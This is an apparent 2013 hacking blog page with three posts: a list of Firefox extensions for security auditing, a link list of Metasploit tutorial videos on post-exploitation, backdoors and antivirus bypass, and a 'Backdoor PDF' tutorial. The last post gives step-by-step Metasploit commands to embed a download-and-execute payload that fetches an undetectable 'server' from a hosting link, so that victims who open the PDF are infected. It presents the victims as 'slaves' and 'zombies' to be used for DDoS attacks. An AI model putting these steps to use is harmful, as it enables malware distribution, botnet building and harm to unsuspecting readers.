Blogger Widgets

Monday, 4 November 2013

Turning Mozilla Firefox Into A Hacking Machine {And Secure In Some Way}!! ;D #Mozilla #Firefox #Hacking #Infosec #Hackers




Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies, shopping, working, “VoIPying”, spying on other people and for sure auditing remote systems.
The security testers’ community has a large panel of security tools, methodologies and much more to perform their pentests and audit assessments. But what happens if you find yourself weaponless.
No more Top 100 security tools, no more LiveCDs and no more exploitation  frameworks. A security auditor without toolbox is like a cop without gun.
Nevertheless, there is maybe a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by hackers and coders. If you don’t want to do the work  below then there is a open source browser based security framework called mantra which comes with preconfigured with all the above extensions + many more. You can download it from H3R3 . Yeah!!

Here is a list of useful security auditing extensions:

*Information Gathering*

Whois And Geo-location

Ø ShowIP : Show the IP address of the current page in the status bar.
It also allows querying custom services by IP (right mouse button) and Hostname (left mouse button), like whois, netcraft.
ØShazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo- locate any website they are currently viewing.
Ø HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox.
ØActive Whois : Starting Active Whois to get details about any Web site owner and its host server.
ØBibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It includes (WhoIs, DNS Report, Geolocation, Traceroute, Ping). Very useful for information gathering phase.

  

*Enumeration / Fingerprinting*

Ø Header Spy : Shows HTTP headers on statusbar.
Ø Header Monitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content Encoding, Content- Type, X-Powered-By and others.

*Social Engineering*

ØPeople Search and Public Record : This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.

 *Googling And Spidering*

ØAdvanced dork : Gives quick access to Google’s Advanced
 Operators directly from the context menu. This could be used to spider a site or scan for hidden files (this spider technique is used via scroogle.org)
Ø SpiderZilla : Spiderzilla is an easy- to-use website mirror utility, based on Httrack-Download from H3R3
ØView Dependencies : View Dependencies adds a tab to the "page info" window, in which it lists all the files which were loaded to show the current page. (useful for a spidering technique) Security Assessment / Code auditing

*Editors*

Ø JSView : The ’view page source’ menu item now opens files based on the behaviour you  choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor.
Ø Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or Thunderbird: an X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new window) or saved to a file (in PEM or DER format – and PKCS#7 provided that the respective patch has been applied - cf.
Ø Firebug : Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
Ø XML Developer Toolbar: Allows XML Developer’s use of standard tools all from your browser.


*Headers Manipulation*

Ø HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content Encoding, Content- Type, X-Powered-By and others.
Ø RefControl : Control what gets sent as the HTTP Referrer on a per- site basis.
Ø User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the browser.

*Cookies Manipulation*

Ø Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.
ØCookieSwap : CookieSwap is an extension that enables you to maintain numerous sets or "profiles" of cookies that you can quickly swap between while browsing.
Ø httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as http Only on the browser side.
Ø Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file.

 *Security Auditing*

Ø HackBar : This toolbar will help you in testing SQL injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code.
Ø Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and post parameters.
Ø Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes special functions specific to web tasks.*Misc*


 *Hacks For Fun*

Ø Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript (scripts could be download here)
Ø Encryption Fire Encrypter : FireEncrypter is a Firefox extension which gives you encryption/decryption and hashing functionalities right from your Firefox browser, mostly useful for developers or for education & fun.

*Malware Scanner*

Ø QArchive.org web files checker : Allowing people to check web files for any malware (viruses, trojans, worms, adware, spyware and other unwanted things) inclusions.
Ø Dr.Web anti-virus link checker :
Ø This plugin allows you to check any file you are about to download, any page you are about to visit
Ø ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with ClamWin.

*Anti Spoof*

Ø refspoof : Easy to pretend to origin from a site by overriding the URL referrer (in a http request). — It incorporates this feature by using the pseudo-protocol spoof:// .. Thus it’s possible to store the information in a "hyperlink" – that can be used in any context... like html pages or bookmarks.

Thanks For Visiting
 

Sunday, 3 November 2013

Metasploit Framework Expert #Metasploit #Hacking #Infosec #Vulnearbility #Exploit #Overflow #Pentesting


Metasploit is?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

Hacking through Metasploit is done in 3 simple steps: Point, Click, Own.


Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)


Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.


Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.


Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

A non-exhaustive list of topics on the tutorial videos includes:


•Metasploit Basics and Framework Organization
•Server and Client Side Exploitation
•Meterpreter - Extensions and Scripting
•Database Integration and Automated Exploitation
•Post Exploitation Kung-Fu - Exploring the system, Privilege escalation, Log deletion and AV / Firewall bypass
•Token stealing and impersonation, Backdoors and Rootkits, Pivoting and Port forwarding, Railgun and Custom Scripting, Backdoor an Executable
•Ruby Primer for Hackers
•Writing Metasploit Modules - Auxiliary and Exploit
•Exploit research with Metasploit- Buffer Overlows, SEH, DEP Bypass, Return Oriented Programming
•Social Engineering Toolkit (SET) and Armitage
•Scenario Based Hacking using Metasploit
 


TUTORIAL VIDEOS ARE ABSOLUTELY FREE.

 The advantages about this video tutorials is that they explain Metaspoilt into details; and you can learn at your own pace in each step; no hurries-Click On Your Desirable topics-(In Bracket)
  1. Metasploit Framework Expert Part 1 (Exploitation Basics)
  2. Metasploit Framework Expert Part 2 ( Why Metasploit? )
  3.  Metasploit Framework Expert Part 3 ( Meterpreter Basics )
  4.  Metasploit Framework Expert Part 4 (Framework Organization)
  5.  Metasploit Framework Expert Part 5 (Post Exploitation Kung-Fu)
  6.  Metasploit Framework Expert Part 6 (Post Exploitation Privilege Escalation)
  7.  Metasploit Framework Expert Part 7 (Killing Av And Disabling Firewall)
  8.  Metasploit Framework Expert Part 8 (Stdapi And Priv Extensions)
  9. Metasploit Framework Expert Part 9 (Token Stealing And Incognito)
  10. Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)
  11.  Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)
  12.  Metasploit Framework Expert Part 12 (Pivoting After Post Exploitation)
  13.  Metasploit Framework Expert Part 13 (Port Forwarding As Part Of Post Exploitation)
  14. Metasploit Framework Expert Part 14 (Client Side Exploits)
  15.  Metasploit Framework Expert Part 15 (Backdoors And Rootkits In Post Exploitation)
  16.  Metasploit Framework Expert Part 16 (Exploit Research With Metasploit)
  17.  Metasploit Framework Expert Part 17 (Railgun Basics)
  18. Metasploit Framework Expert Part 18 (Railgun Adding Functions)
  19.  Metasploit Framework Expert Part 19 (Railgun Adding New Dlls)
  20.  Metasploit Framework Expert Part 19A (Railgun Adding New Dlls On Windows 7)
  21. Metasploit Framework Expert Part 20 (Resource Scripts)
  22.  Metasploit Framework Expert Part 21 (Database Support)
  23. Metasploit Framework Expert Part 22 (Using Plugins)
  24.  Metasploit Framework Expert Part 23 (Meterpreter Api Basics)
  25.  Metasploit Framework Expert Part 24 (Meterpreter Scripting Migrate Clone)
  26. Metasploit Framework Expert Part 25 (Meterpreter Scripting Process Name Search)

Tools website-Click H3R3


Sorry Guys but I just need 15 Seconds from you guys-create some cash flow that will keep my hobbie of blogging about Infosec, Hacking,Techie Stuff running-
You already know the drill: if you're stuck or puzzled just check out the pictures below
 Skip Ad's where you  click to after 5 Seconds-Thanks Again For Visiting :)


Wednesday, 30 October 2013

Backdoor PDF #Hacker #Hacking #Exploit #Hacker #Pdf #Backdoor





This tutorial will guide you how to backdoor a PDF. What this basically does is that it will download your server when someone opens your PDF file I am not responsible for what you use this guide for *Giggling* {Try not to infect the entire PDF files on the Internet,some of us love reading} *Smirking*


Tutorial:


Requirements:

-Metasploit, 
-A PDF eBook 
-And a FUD server. 


Metasploit can be downloaded from HERE


Search the web for free eBooks if you don't have any on your e-library

>>Make your PDF file ready, upload your FUD server to a hosting service which provides direct download links, I would use Dropbox, Mediafire, 4shared, 2shared

>>And make sure that you have installed Metasploit correctly!



Now we will infect the PDF file


1. Open up Metasploit console


2. Type this in the console: use exploit/windows/fileformat/adobe_pdf_embedded_exe


3. Type this in the console: set payload windows/download_exec


4. Type this in console: set INFILENAME <location of your pdf to infect here>

EXAMPLE: set INFILENAME C:/Users/Owner/Desktop/example.pdf


5. Type this in console: set url <direct download link to your fud server>

EXAMPLE: set url http://download.com/server.exe


6. Type this in console: Exploit

Now you have infected your PDF file and you will be ready to send it out, when people open the infected PDF file then it will download your server and *BAM* new slave.

(The infected PDF file will be in the same directory as the original and will be named “evil.pdf”)

-Ok, that's how you get your zombies,..they may come in handy when you decide to execute a distributed denial of service attack- *Chuckles* "Yeah I was never here, when you get caught: you're on your own" That phrase simply means am not responsible for any trouble,complications or holes you fall into during your adventures-  *Flips & Slides*